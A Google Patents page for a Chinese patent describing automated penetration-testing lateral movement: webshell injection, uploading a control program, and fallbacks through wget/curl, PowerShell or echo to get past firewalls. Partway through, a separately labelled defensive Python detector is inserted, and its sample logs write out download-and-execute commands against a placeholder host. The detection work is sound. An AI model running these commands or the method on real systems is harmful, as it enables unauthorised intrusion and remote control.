CN117478721A - Connection method, device, equipment and storage medium for control program - Google Patents

Info

Publication number: CN117478721A
Authority: CN (China)
Prior art keywords: controlled, target node, control program, operating system, script
Legal status: Granted (active)
Application number: CN202311837033.7A
Other languages: Chinese (zh)
Other versions: CN117478721B (granted publication)
Inventor: 张云宇
Current Assignee: Beijing Huayuan Information Technology Co Ltd
Original Assignee: Beijing Huayuan Information Technology Co Ltd
Application filed by: Beijing Huayuan Information Technology Co Ltd
Priority to: CN202311837033.7A

Classifications

    • H04L67/141 Setup of application sessions (H04L67/00 Network arrangements or protocols for supporting network services or applications; H04L67/14 Session management)
    • H04L63/0281 Proxies (H04L63/00 Network architectures or network communication protocols for network security; H04L63/02 Separating internal from external traffic, e.g. firewalls)
    • H04L63/1433 Vulnerability analysis (H04L63/14 Detecting or protecting against malicious traffic)
    • H04L67/56 Provisioning of proxy services (H04L67/50 Network services)
    • H04L9/40 Network security protocols (H04L9/00 Cryptographic mechanisms or cryptographic arrangements for secret or secure communications)

Abstract

The embodiments of the disclosure provide a method, a device, equipment and a storage medium for connecting a control program, applied in the technical field of attack and defense. The method comprises the steps that a test server obtains a target node to be controlled and a corresponding vulnerability exploitation script in a target network; reads the vulnerability exploitation script to obtain an executable action corresponding to the script; when the vulnerability exploitation script can be successfully injected into the webshell, uploads a control program to the target node to be controlled by using the webshell; and opens an access agent on the target node to be controlled by using the webshell, and establishes a connection with the target node to be controlled by using the access agent. In this way, a method by which an adaptive control program is automatically uploaded and connected can be provided, addressing the connection-establishment problems that firewalls raise.

Description

Connection method, device, equipment and storage medium for control program
Technical Field
The disclosure relates to the technical field of network security, in particular to the technical field of attack and defense, and specifically relates to a control program connection method, a device, equipment and a storage medium.
Background
In penetration testing, an intranet lateral movement attack test proceeds as follows: once a target is successfully compromised, a new node is implanted on the compromised target, and that new node is then used to keep discovering new targets and carrying the attack forward. When, in such a test, a vulnerability can be exploited to attack the target successfully and commands can be executed, a control program must be uploaded to and connected with the target if the target is to be controlled more fully, that is, remotely controlled.
However, establishing that connection can be blocked by firewall constraints. If the target sits behind an access control firewall, the connection cannot be made even though the control program is listening on a port for it; likewise, if the target has no outbound network access, the connection cannot be made even though the control program is listening. In a fully automated scenario, either problem means that a target which is clearly attackable nonetheless ends in a failed attack purely for network reasons. There is therefore a strong need for a method by which an adaptive control program is automatically uploaded and connected, so as to solve the connection-establishment problem posed by firewalls.
Disclosure of Invention
The present disclosure provides a connection method, apparatus, device, and storage medium for a control program.
According to a first aspect of the present disclosure, there is provided a connection method of a control program. The method comprises the following steps:
acquiring a target node to be controlled and a corresponding vulnerability exploitation script in a target network;
reading the vulnerability exploitation script to obtain an executable action corresponding to the vulnerability exploitation script;
when the vulnerability exploitation script can be successfully injected into the webshell, uploading a control program to the target node to be controlled by using the webshell;
and opening an access agent on the target node to be controlled by using the webshell, and establishing connection with the target node to be controlled by using the access agent.
In the foregoing aspect and any possible implementation manner, there is further provided an implementation manner in which the method further includes:
when the vulnerability exploitation script cannot be successfully injected into webshell files, determining an operating system, and uploading a control program to the target node to be controlled according to an execution command corresponding to the operating system;
and establishing connection with the target node to be controlled.
In the foregoing aspect and any possible implementation manner, there is further provided an implementation manner, where determining an operating system, and uploading a control program to the target node to be controlled according to an execution command corresponding to the operating system includes:
judging whether an operating system is given;
if the operating system is given, uploading a control program to the target node to be controlled by utilizing an execution command corresponding to the operating system;
if the operating system is not given, judging whether the judgment can be carried out according to the time delay;
if the judgment can be made according to the time delay, determining the operating system from the time delay of an execution command without echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system;
if the judgment cannot be made according to the time delay, performing a reverse-connection guess by using an execution command without echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system.
In the foregoing aspect and any possible implementation manner, there is further provided an implementation manner, where establishing a connection with the target node to be controlled includes:
listening on a service port of the test server, using the vulnerability exploitation script to execute a control program test command on the target node to be controlled so that the target node connects to that service port of the test server, and determining whether the target node to be controlled can be connected in a reverse connection mode; or,
using the vulnerability exploitation script to execute a control program test command on the target node to be controlled so that the target node listens on a service port of its own, connecting to that service port on the target node to be controlled, and determining whether the target node to be controlled can be connected in a forward connection mode.
In the foregoing aspect and any possible implementation manner, there is further provided an implementation manner, where uploading the control program to the target node to be controlled according to an execution command corresponding to the operating system includes:
starting an http server, mounting a control program on the http server, and executing a remote downloading command on the target node to be controlled by utilizing an execution command corresponding to an operating system so as to upload the control program to the target node to be controlled.
The aspect and any possible implementation manner as described above further provide an implementation manner, where uploading the control program to the target node to be controlled according to an execution command corresponding to the operating system further includes:
and writing a preset script on the target node to be controlled by using an execution command corresponding to the operating system and running a script downloading command so as to upload a control program to the target node to be controlled.
The aspect and any possible implementation manner as described above further provide an implementation manner, where uploading the control program to the target node to be controlled according to an execution command corresponding to the operating system further includes:
and writing a control program to the target node to be controlled by using an execution command corresponding to the operating system.
According to a second aspect of the present disclosure, there is provided a connection device of a control program. The device comprises:
the acquisition module is used for acquiring a target node to be controlled and a corresponding vulnerability exploitation script in the target network;
the reading module is used for reading the vulnerability exploiting script and obtaining executable actions corresponding to the vulnerability exploiting script;
the transmission module is used for uploading a control program to the target node to be controlled by using the webshell when the vulnerability exploitation script can be successfully injected into the webshell;
and the connection module is used for opening an access agent on the target node to be controlled by utilizing the webshell and establishing connection with the target node to be controlled by utilizing the access agent.
According to a third aspect of the present disclosure, an electronic device is provided. The electronic device includes: a memory and a processor, the memory having stored thereon a computer program, the processor implementing the method as described above when executing the program.
According to a fourth aspect of the present disclosure, there is provided a computer readable storage medium having stored thereon a computer program which when executed by a processor implements a method as described above.
According to the connection method, device, equipment and storage medium of the control program provided by the embodiments of the application, the test server obtains the target node to be controlled and the corresponding vulnerability exploitation script in the target network; reads the vulnerability exploitation script to obtain the executable action corresponding to it; when the vulnerability exploitation script can be successfully injected into the webshell, uploads a control program to the target node to be controlled by using the webshell; and opens an access agent on the target node to be controlled by using the webshell and establishes a connection with the target node by using the access agent. On this basis, the control program is uploaded and commanded to the target node through the executable action corresponding to the vulnerability exploitation script, namely webshell injection; the webshell is then used to open and start an access agent on a service port of the target node, so that the control program listens on a service port of the target node; and once a connection address is being listened on, a connection can be established between the test server and the target node through the access agent, thereby realizing connection of the control program.
It should be understood that what is described in this summary is not intended to limit the critical or essential features of the embodiments of the disclosure nor to limit the scope of the disclosure. Other features of the present disclosure will become apparent from the following description.
Drawings
The above and other features, advantages and aspects of embodiments of the present disclosure will become more apparent by reference to the following detailed description when taken in conjunction with the accompanying drawings. For a better understanding of the present disclosure, and without limiting the disclosure thereto, the same or similar reference numerals denote the same or similar elements, wherein:
FIG. 1 illustrates a schematic diagram of an exemplary operating environment in which embodiments of the present disclosure can be implemented;
FIG. 2 illustrates a flowchart of a method of connection of a control program according to an embodiment of the present disclosure;
FIG. 3 illustrates a flow chart of target system environment detection, network environment detection, control program writing, and establishing a connection according to an embodiment of the present disclosure;
FIG. 4 illustrates a flow chart of target system environment detection, network environment detection, control program writing, and automated bot upload in establishing a connection, according to an embodiment of the present disclosure;
fig. 5 shows a block diagram of a connection device of a control program according to an embodiment of the present disclosure;
fig. 6 illustrates a block diagram of an exemplary electronic device capable of implementing embodiments of the present disclosure.
Detailed Description
For the purposes of making the objects, technical solutions and advantages of the embodiments of the present disclosure more apparent, the technical solutions of the embodiments of the present disclosure will be clearly and completely described below with reference to the accompanying drawings in the embodiments of the present disclosure, and it is apparent that the described embodiments are some embodiments of the present disclosure, but not all embodiments. All other embodiments, which can be made by one of ordinary skill in the art based on the embodiments in this disclosure without inventive faculty, are intended to be within the scope of this disclosure.
In addition, the term "and/or" herein is merely an association relationship describing an association object, and means that three relationships may exist, for example, a and/or B may mean: a exists alone, A and B exist together, and B exists alone. In addition, the character "/" herein generally indicates that the front and rear associated objects are an "or" relationship.
In the disclosure, the control program is uploaded and commanded to the target node to be controlled through the executable action corresponding to the vulnerability exploitation script, namely webshell injection; the webshell is then used to open the access agent on a service port of the target node to be controlled, so that the control program listens on that service port on the target node; and once the connection address is being listened on, the test server can use the access agent to establish a connection with the target node to be controlled, thereby realizing connection of the control program.
FIG. 1 illustrates a schematic diagram of an exemplary operating environment 100 in which embodiments of the present disclosure can be implemented. Included in the operating environment 100 are a test server 102 and a target network 104.
The test server 102 includes a management terminal admin and a primary node agent0. The management terminal admin scans the network and can select any node as the primary node agent0, and then uses the primary node agent0 to scan the vulnerability information of the target network 104, so as to obtain the node with the available vulnerability in the target network 104, namely the target node agent1 to be controlled.
When the primary node agent0 finds the target node agent1 to be controlled through scanning, it can perform the exploit execution command on the target node agent1 to be controlled. However, at this time, the primary node agent0 is not aware of any network situation, such as the system environment and network environment of the target node to be controlled, is only aware of the service port that can be connected to the target node agent1 to be controlled, and can execute the command using the service port. Based on this, if it is clear that the target node agent1 to be controlled can be attacked, but the network situation is not clear, it is necessary to perform target system environment detection, network environment detection and control program writing based on the current running environment 100, and establish connection between the target node agent1 to be controlled and the primary node agent0 according to the network environment limitation, so as to complete automatic uploading and connection of the control program.
Fig. 2 shows a flowchart of a connection method 200 of a control program according to an embodiment of the present disclosure. The method 200 may be performed by the test server 102 in fig. 1.
At block 210, a target node to be controlled in a target network and a corresponding exploit script are obtained.
In some embodiments, agent0 obtains a target node to be controlled (an agent) in the target network together with the corresponding exploit script exp. The exp is the exploit script called by the exp module in agent0, that is, the exploitation script for the corresponding vulnerability that the exp module loads; the exp module is the module used to attack the target node to be controlled.
At block 220, the exploit script is read, resulting in an executable action corresponding to the exploit script.
In some embodiments, agent0 reads information in exp, obtains exp executable actions and restrictions.
In some embodiments, the exp executable actions may include webshell injection and may also include execution commands. Webshell injection uploads a preset script to the target server through its http service, so that the preset script itself then provides an http service externally; file upload and command control can then be performed through the service this script provides.
In some embodiments, the restrictions may include whether there is echo (command output), whether remote loading is required, and whether a time delay can be used.
At block 230, when the exploit script is able to successfully inject the webshell, the webshell is used to upload the control program to the target node to be controlled.
In some embodiments, agent0 may call the webshell injection function in exp to attempt to write a webshell file, so that the webshell may upload the control program bot to the target node to be controlled.
When the exploit script can be successfully injected into the webshell, agent0 can use the webshell to acquire basic information about the target node to be controlled. Because the target node's own service is being used directly, the network path is necessarily open at this point, and the bot can be uploaded and executed by using the file upload function.
It should be noted that, at this time, the target system environment detection, the network environment detection, and the control program writing are completed, and then the agent1 and the agent0 can be connected according to the network environment limitation, so as to complete the automatic uploading and connection of the bot, i.e. the bot availability verification.
At block 240, the access agent is opened on the target node to be controlled using the webshell, and a connection is established with the target node to be controlled using the access agent.
In some embodiments, a test module is self-contained on the bot, which is used to test the network connectivity of agent1 and agent0.
It should be noted that the network environment results tested above are not reused at this point, because those results may have been influenced by the particular program involved; for example, a firewall may automatically allow the traffic of a known program.
Thus, once a webshell has been implanted in agent1, agent0 can open an access agent on agent1 using the webshell; the bot then listens on a local address on agent1, such as 127.0.0.1, and agent0 connects into agent1 through the access agent. Because the access agent is opened directly on agent1's service port, agent0 is certain to be able to reach it.
According to the embodiment of the disclosure, when the target has an access control firewall, so that, for example, a connection cannot be made even though the control program listens on a port, then in a fully automated scenario the test server obtains the target node to be controlled and the corresponding exploit script in the target network, reads the exploit script to obtain the executable actions corresponding to it, uploads the control program to the target node to be controlled by using the webshell when the exploit script can be successfully injected into the webshell, opens an access agent on the target node to be controlled by using the webshell, and establishes a connection with the target node to be controlled through the access agent. On this basis, the control program is uploaded and commanded to the target node through the executable action corresponding to the exploit script, namely webshell injection; the webshell is then used to open and start an access agent on a service port of the target node, so that the control program listens on a service port of the target node; and once a connection address is being listened on, a connection can be established between the test server and the target node through the access agent, thereby realizing connection of the control program.
In some embodiments, the above method further comprises:
when the exploit script cannot be successfully injected into the webshell file, determining an operating system, and uploading a control program to a target node to be controlled according to an execution command corresponding to the operating system;
and establishing connection with the target node to be controlled.
In some embodiments, when the exploit script cannot successfully inject the webshell file, indicating that writing of the bot cannot be performed through the webshell currently, the writing of the bot may be performed by using a command execution mode.
In some embodiments, when writing a bot by using a command execution mode, it is necessary to determine an operating system first, and then execute a corresponding command according to a different operating system.
According to the embodiment of the disclosure, the control program is uploaded to the target node to be controlled according to the execution command corresponding to the operating system, and the connection is established with the target node to be controlled, so that the bot writing can be performed in a targeted manner according to the characteristics of each operating system by using the corresponding command execution mode, and more choices are provided for the user.
In some embodiments, the determining the operating system, and uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system includes:
judging whether an operating system is given;
if the operating system is given, uploading the control program to the target node to be controlled by utilizing an execution command corresponding to the operating system;
if the operating system is not given, judging whether the judgment can be carried out according to the time delay;
if the judgment can be made according to the time delay, determining the operating system from the time delay of an execution command without echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system;
if the judgment cannot be made according to the time delay, performing a reverse-connection guess by using an execution command without echo, and uploading the control program to the target node to be controlled by using the execution command corresponding to the operating system.
In some embodiments, if the operating system cannot currently be determined, it may be determined from the exp restrictions, that is, whether there is echo, whether remote loading is required, and whether a time delay is possible, after which the control program is uploaded to the target node to be controlled by using the execution command corresponding to the operating system.
According to the embodiment of the disclosure, the operating system can be judged under the condition that the operating system cannot be determined, so that uploading of the control program to the target node to be controlled by using the corresponding execution command of the operating system is further completed.
In some embodiments, the establishing a connection with the target node to be controlled includes:
listening on a service port of the test server, using the vulnerability exploitation script to execute a control program test command on the target node to be controlled so that the target node connects to that service port of the test server, and determining whether the target node to be controlled can be connected in a reverse connection mode; or,
using the vulnerability exploitation script to execute a control program test command on the target node to be controlled so that the target node listens on a service port of its own, connecting to that service port on the target node to be controlled, and determining whether the target node to be controlled can be connected in a forward connection mode.
In some embodiments, when uploading the bot to agent1 by using the execution command corresponding to the operating system, a port may first be listened on at the host, i.e. agent0; the bot's test command is then executed on the victim, i.e. agent1, by using exp, so that the victim connects to the port listened on at the host. From this it can be learned whether agent1 can connect to agent0 by way of reverse connection.
In some embodiments, when uploading the bot to agent1 by using the execution command corresponding to the operating system, exp may instead be used to execute the bot's test command on the victim so that the victim listens on a port of its own, and agent0 then connects to that port on the victim. From this it can be learned whether the victim can be connected to by way of forward connection.
According to the embodiment of the disclosure, the specific implementation manner of uploading the bot to the agent1 by using the execution command corresponding to the operating system can be provided in the above manner, so that the uploading of the control program to the target node to be controlled by using the execution command corresponding to the operating system is further completed.
In some embodiments, the uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system includes:
starting an http server, mounting a control program on the http server, and executing a remote downloading command on the target node to be controlled by utilizing an execution command corresponding to the operating system so as to upload the control program to the target node to be controlled.
In some embodiments, the uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system further includes:
and writing a preset script on the target node to be controlled by using an execution command corresponding to the operating system and running a script downloading command so as to upload the control program to the target node to be controlled.
In some embodiments, the uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system further includes:
and writing a control program to the target node to be controlled by using an execution command corresponding to the operating system.
In some embodiments, an http server may be started on agent0 with the bot mounted on it, and then two remote download commands, such as wget and curl, are executed in succession on agent1 through the exp. This serves two purposes: it detects whether either of the two programs is present on agent1, and it detects whether agent1 can reach out of the network. If the http server on agent0 receives the connection, this indicates that agent1 has a corresponding download command and can connect outward to agent0; at this point the bot has been uploaded, and connection detection, i.e., bot availability verification, can be performed.
In some embodiments, if the http server on agent0 does not receive a connection, either agent1 cannot reach out of the network or the corresponding command is absent, and probing may continue using a script. For example, under a Linux operating system a shell script may be written to agent1 and then run to perform the download; under a Windows operating system, powershell may be used for the download. If the reverse connection is received, the target can reach out of the network and connection detection may be performed.
It should be noted that writing the script under Linux takes many steps, and a powershell script under Windows is not necessarily authorized to execute; if the user has these concerns, the user may skip the manner of first writing the preset script to agent1 with the execution command corresponding to the operating system and running the script download command to upload the bot to agent1.
In some embodiments, if the http server on agent0 still receives no connection, agent1 most likely cannot reach out of the network, or no script command is available; an attempt may then be made to write the bot in actively with the echo command, and connection detection may be performed after the write completes. However, writing the bot in with echo in this manner is slow.
It should be noted that which manner of uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system is used, that is, whether the execution command corresponding to the operating system is used directly to execute the remote download command on agent1, is used to write the preset script on agent1 and run the script download command, or is used to write the bot to agent1 with echo, may be selected according to the actual requirement of the user or according to a preset rule, which is not limited herein.
According to the embodiment of the disclosure, different implementations of uploading the control program to the target node to be controlled according to the execution command corresponding to the operating system can be provided through the above-mentioned process, so that more choices are provided for the user.
Referring to fig. 3 and 4, another method of connecting control programs is provided.
In some embodiments, agent0 obtains an agent and a corresponding exp in the target network, reads the information in the exp, and obtains the executable actions and restrictions of the exp, where the executable actions include webshell injection and command execution, and the restrictions include whether there is echo (command output), whether remote loading is required, and whether time delay can be used. The restrictions are used to determine the operating system.
When the webshell can be successfully injected using the exp, the webshell is used to acquire the basic information of agent1, and the file upload function is used to upload the bot to agent1 and execute it so as to judge the network environment. When the webshell cannot be successfully injected using the exp, a command execution mode, that is, uploading by using the command execution function, can be used. Before uploading with the command execution function, the operating system is judged so that the command corresponding to the operating system in use can be executed.
Judging the operating system comprises: judging whether the operating system is given; if it is given, carrying out automatic bot uploading according to the operating system in use; if it is not given, judging whether the operating system can be judged according to time delay; if it can, judging the operating system by the time delay of an execution command without echo; and if it cannot, executing an execution command without echo to guess the operating system.
Automatic bot uploading comprises: for the known operating systems, namely Windows and Linux, an http server is started on agent0 and a wget and curl test is performed, and it is judged whether agent0 receives the back connection. If agent0 receives the back connection, bot availability verification is carried out under the respective operating system. If agent0 does not receive the back connection, i.e., no command was executed or agent1 cannot reach out of the network, a powershell download is performed under Windows and a shell script remote download under Linux, and it is again judged whether agent0 receives the back connection. If it does, bot availability verification is carried out under the respective operating system; if it still does not, it cannot be determined that agent1 can reach out of the network, so active writing is required: echo writing is performed under the respective operating system, followed by bot availability verification under the respective operating system.
According to the embodiment of the disclosure, through the above method the network environment and limitations between agent0 and the bot can be obtained, so that the user can select the optimal connection mode according to the connectivity result and coordinate agent0 to perform the corresponding operation, namely starting the listener or actively connecting to the bot; thus the purpose of selecting an appropriate connection mode according to the actual network communication condition is achieved, and communication with the bot is ensured.
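Read from the defender's side, the three upload strategies described above (remote download with wget/curl, script-based download, echo write) and the flow of fig. 3 and 4 leave a recognisable pattern in process-creation telemetry: a web-server worker spawns a command that fetches or writes a file, and the same file is executed on that host shortly afterwards. The following detection logic is an added example written for this page, not code from the patent or its applicant. It runs over a constructed process log (Sysmon event 1 / auditd execve style, reduced to the fields it needs); the host names, file paths and the 198.51.100.7 address are placeholders.

```python
"""Defender-side detection of the staged upload chain described in the text.
Added example, not part of the patent. Input is a constructed process-creation
log reduced to timestamp, host, parent image and command line."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    ts: int        # event time (seconds); only ordering matters here
    host: str
    parent: str    # image name of the parent process
    cmdline: str


@dataclass(frozen=True)
class Alert:
    host: str
    ts: int
    kind: str      # "stage1_<technique>" or "stage2_exec_after_<technique>"
    cmdline: str


# Web-server worker images that should not normally spawn download or file-write commands.
WEB_PARENTS = {"httpd", "nginx", "php-fpm", "w3wp.exe", "tomcat", "java"}

# Stage-1 indicators, one per upload strategy the text enumerates.
ECHO_WRITE_RE = re.compile(r"\becho\b.*?>>?\s*(\S+)")                 # echo ... >> file
REMOTE_DL_RE = re.compile(r"\b(?:wget|curl)\b.*https?://", re.I)       # wget/curl fetch
WGET_CURL_OUT = re.compile(r"\s-[oO]\s+(\S+)")                         # -O file / -o file
PS_DL_RE = re.compile(r"powershell.*(?:DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b)", re.I)
PS_OUT_RES = [re.compile(r"-OutFile\s+(\S+)", re.I),
              re.compile(r"DownloadFile\(\s*['\"][^'\"]*['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)]


def _clean(path: Optional[str]) -> Optional[str]:
    return path.strip("'\"") if path else None


def classify_stage1(cmdline: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (technique, written_path) if cmdline is one of the three upload
    strategies, else None. echo-write is tested first so that an echoed
    'wget ...' line is attributed to the file write, not to a live download."""
    m = ECHO_WRITE_RE.search(cmdline)
    if m:
        return "echo_write", _clean(m.group(1))
    if REMOTE_DL_RE.search(cmdline):
        m = WGET_CURL_OUT.search(cmdline)
        return "remote_download", (_clean(m.group(1)) if m else None)
    if PS_DL_RE.search(cmdline):
        for rx in PS_OUT_RES:
            m = rx.search(cmdline)
            if m:
                return "script_download", _clean(m.group(1))
        return "script_download", None
    return None


def detect_staged_upload(events: Iterable[ProcEvent]) -> List[Alert]:
    """Correlate, per host, a web-server child that fetches or writes a file
    (stage 1) with any later command on that host that references the file
    (stage 2). Each stage raises its own alert, so a blocked download still shows."""
    pending = {}   # (host, path) -> (ts, technique) awaiting execution
    alerts: List[Alert] = []
    for e in sorted(events, key=lambda ev: ev.ts):
        s1 = classify_stage1(e.cmdline) if e.parent.lower() in WEB_PARENTS else None
        if s1:
            technique, path = s1
            alerts.append(Alert(e.host, e.ts, "stage1_" + technique, e.cmdline))
            if path:
                pending[(e.host, path)] = (e.ts, technique)
            continue
        for (host, path), (ts0, technique) in list(pending.items()):
            if host == e.host and e.ts > ts0 and path in e.cmdline:
                alerts.append(Alert(host, e.ts, "stage2_exec_after_" + technique, e.cmdline))
                del pending[(host, path)]
    return alerts


# Constructed sample telemetry; host names and 198.51.100.7 (TEST-NET-2) are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(100, "linux-web-01", "httpd", "sh -c id"),
    ProcEvent(110, "linux-web-01", "httpd", "sh -c 'wget http://198.51.100.7:8080/b -O /tmp/b'"),
    ProcEvent(111, "linux-web-01", "httpd", "sh -c 'curl http://198.51.100.7:8080/b -o /tmp/b'"),
    ProcEvent(120, "linux-web-01", "httpd", "sh -c 'chmod +x /tmp/b && /tmp/b'"),
    ProcEvent(150, "linux-web-01", "cron", "curl https://updates.example.com/x -o /tmp/u"),
    ProcEvent(200, "win-web-01", "w3wp.exe",
              "cmd.exe /c powershell -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://198.51.100.7:8080/b.exe','C:\\Temp\\b.exe')\""),
    ProcEvent(210, "win-web-01", "w3wp.exe", "cmd.exe /c C:\\Temp\\b.exe"),
    ProcEvent(300, "linux-web-02", "nginx", "sh -c \"echo 'wget http://198.51.100.7:8080/b -O /tmp/b' >> /tmp/d.sh\""),
    ProcEvent(301, "linux-web-02", "nginx", "sh -c \"echo '/tmp/b' >> /tmp/d.sh\""),
    ProcEvent(310, "linux-web-02", "nginx", "sh -c 'sh /tmp/d.sh'"),
]

if __name__ == "__main__":
    for a in detect_staged_upload(SAMPLE_EVENTS):
        print(f"{a.host} t={a.ts} {a.kind}: {a.cmdline}")
```

Both stages alert separately, so a download that egress filtering blocks (the text's "not out of the network" case) still surfaces as a stage-1 event on the web host, while the stage-2 correlation is what distinguishes a probe from a completed upload. The cron-parented curl in the sample is deliberately ignored, since the parent-image filter is what keeps routine package or update fetches out of the alert stream.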
It should be noted that, for simplicity of description, the foregoing method embodiments are all described as a series of acts, but it should be understood by those skilled in the art that the present disclosure is not limited by the order of acts described, as some steps may be performed in other orders or concurrently in accordance with the present disclosure. Further, those skilled in the art will also appreciate that the embodiments described in the specification are all alternative embodiments, and that the acts and modules referred to are not necessarily required by the present disclosure.
The foregoing is a description of embodiments of the method, and the following further describes embodiments of the present disclosure through examples of apparatus.
Fig. 5 shows a block diagram of a connection device 500 of a control program according to an embodiment of the present disclosure. The apparatus 500 may be included in the test server 102 of fig. 1 or implemented as the test server 102. As shown in fig. 5, the apparatus 500 includes:
an obtaining module 510, configured to obtain a target node to be controlled and a corresponding exploit script in a target network;
the reading module 520 is configured to read the exploit script, and obtain an executable action corresponding to the exploit script;
a transmission module 530, configured to, when the vulnerability exploiting script can be successfully injected into the webshell, upload the control program to the target node to be controlled by using the webshell;
the connection module 540 is configured to open an access agent on the target node to be controlled by using the webshell, and establish a connection with the target node to be controlled by using the access agent.
It will be clear to those skilled in the art that, for convenience and brevity of description, specific working procedures of the described modules may refer to corresponding procedures in the foregoing method embodiments, which are not described herein again.
In the technical scheme of the disclosure, the acquisition, storage, application and the like of the related user personal information all conform to the provisions of the relevant laws and regulations and do not violate public order and good morals.
According to embodiments of the present disclosure, the present disclosure also provides an electronic device, a readable storage medium and a computer program product.
Fig. 6 illustrates a block diagram of an exemplary electronic device 600 capable of implementing embodiments of the present disclosure. Electronic devices are intended to represent various forms of digital computers, such as laptops, desktops, workstations, personal digital assistants, servers, blade servers, mainframes, and other appropriate computers. The electronic device may also represent various forms of mobile devices, such as personal digital processing, cellular telephones, smartphones, wearable devices, and other similar computing devices. The components shown herein, their connections and relationships, and their functions, are meant to be exemplary only, and are not meant to limit implementations of the disclosure described and/or claimed herein.
The electronic device 600 includes a computing unit 601 that can perform various appropriate actions and processes according to a computer program stored in a ROM 602 or a computer program loaded from a storage unit 608 into a RAM 603. In the RAM 603, various programs and data required for the operation of the electronic device 600 can also be stored. The computing unit 601, ROM 602, and RAM 603 are connected to each other by a bus 604. An I/O interface 605 is also connected to bus 604.
A number of components in the electronic device 600 are connected to the I/O interface 605, including: an input unit 606 such as a keyboard, mouse, etc.; an output unit 607 such as various types of displays, speakers, and the like; a storage unit 608, such as a magnetic disk, optical disk, or the like; and a communication unit 609 such as a network card, modem, wireless communication transceiver, etc. The communication unit 609 allows the electronic device 600 to exchange information/data with other devices through a computer network, such as the internet, and/or various telecommunication networks.
The computing unit 601 may be a variety of general and/or special purpose processing components having processing and computing capabilities. Some examples of computing unit 601 include, but are not limited to, a Central Processing Unit (CPU), a Graphics Processing Unit (GPU), various specialized Artificial Intelligence (AI) computing chips, various computing units running machine learning model algorithms, a Digital Signal Processor (DSP), and any suitable processor, controller, microcontroller, etc. The computing unit 601 performs the various methods and processes described above, such as method 200. For example, in some embodiments, the method 200 may be implemented as a computer software program tangibly embodied on a machine-readable medium, such as the storage unit 608.
In some embodiments, part or all of the computer program may be loaded and/or installed onto the electronic device 600 via the ROM 602 and/or the communication unit 609. One or more of the steps of the method 200 described above may be performed when a computer program is loaded into RAM 603 and executed by the computing unit 601. Alternatively, in other embodiments, computing unit 601 may be configured to perform method 200 by any other suitable means (e.g., by means of firmware).
Various implementations of the systems and techniques described here above may be implemented in digital electronic circuitry, integrated circuit systems, Field Programmable Gate Arrays (FPGAs), Application Specific Integrated Circuits (ASICs), Application Specific Standard Products (ASSPs), Systems On Chip (SOCs), Complex Programmable Logic Devices (CPLDs), computer hardware, firmware, software, and/or combinations thereof. These various embodiments may include: implementation in one or more computer programs, which may be executed and/or interpreted on a programmable system including at least one programmable processor, which may be a special purpose or general-purpose programmable processor, that may receive data and instructions from, and transmit data and instructions to, a storage system, at least one input device, and at least one output device.
Program code for carrying out methods of the present disclosure may be written in any combination of one or more programming languages. These program code may be provided to a processor or controller of a general purpose computer, special purpose computer, or other programmable data processing apparatus such that the program code, when executed by the processor or controller, causes the functions/operations specified in the flowchart and/or block diagram to be implemented. The program code may execute entirely on the machine, partly on the machine, as a stand-alone software package, partly on the machine and partly on a remote machine or entirely on the remote machine or server.
In the context of this disclosure, a machine-readable medium may be a tangible medium that can contain, or store a program for use by or in connection with an instruction execution system, apparatus, or device. The machine-readable medium may be a machine-readable signal medium or a machine-readable storage medium. The machine-readable medium may include, but is not limited to, an electronic, magnetic, optical, electromagnetic, infrared, or semiconductor system, apparatus, or device, or any suitable combination of the foregoing. More specific examples of a machine-readable storage medium would include an electrical connection based on one or more wires, a portable computer diskette, a hard disk, a Random Access Memory (RAM), a read-only memory (ROM), an erasable programmable read-only memory (EPROM or flash memory), an optical fiber, a portable compact disc read-only memory (CD-ROM), an optical storage device, a magnetic storage device, or any suitable combination of the foregoing.
To provide for interaction with a user, the systems and techniques described here can be implemented on a computer having: display means for displaying information to a user; and a keyboard and pointing device (e.g., a mouse or trackball) by which a user can provide input to the computer. Other kinds of devices may also be used to provide for interaction with a user; for example, feedback provided to the user may be any form of sensory feedback (e.g., visual feedback, auditory feedback, or tactile feedback); and input from the user may be received in any form, including acoustic input, speech input, or tactile input.
The systems and techniques described here can be implemented in a computing system that includes a back-end component (e.g., as a data server), or that includes a middleware component (e.g., an application server), or that includes a front-end component (e.g., a user computer having a graphical user interface or a web browser through which a user can interact with an implementation of the systems and techniques described here), or any combination of such back-end, middleware, or front-end components. The components of the system can be interconnected by any form or medium of digital data communication (e.g., a communication network). Examples of communication networks include: Local Area Networks (LANs), Wide Area Networks (WANs), and the internet.
The computer system may include a client and a server. The client and server are typically remote from each other and typically interact through a communication network. The relationship of client and server arises by virtue of computer programs running on the respective computers and having a client-server relationship to each other. The server may be a cloud server, a server of a distributed system, or a server incorporating a blockchain.
It should be appreciated that various forms of the flows shown above may be used to reorder, add, or delete steps. For example, the steps recited in the present disclosure may be performed in parallel, sequentially, or in a different order, provided that the desired results of the disclosed aspects are achieved, and are not limited herein.
The above detailed description should not be taken as limiting the scope of the present disclosure. It will be apparent to those skilled in the art that various modifications, combinations, sub-combinations and alternatives are possible, depending on design requirements and other factors. Any modifications, equivalent substitutions and improvements made within the spirit and principles of the present disclosure are intended to be included within the scope of the present disclosure.

Claims (10)

1. A method for connecting a control program, applied to a test server, comprising:
acquiring a target node to be controlled and a corresponding vulnerability exploitation script in a target network;
reading the vulnerability exploitation script to obtain an executable action corresponding to the vulnerability exploitation script;
when the vulnerability exploitation script can be successfully injected into the webshell, uploading a control program to the target node to be controlled by using the webshell;
and opening an access agent on the target node to be controlled by using the webshell, and establishing connection with the target node to be controlled by using the access agent.
2. The method according to claim 1, wherein the method further comprises:
when the vulnerability exploitation script cannot be successfully injected into webshell files, determining an operating system, and uploading a control program to the target node to be controlled according to an execution command corresponding to the operating system;
and establishing connection with the target node to be controlled.
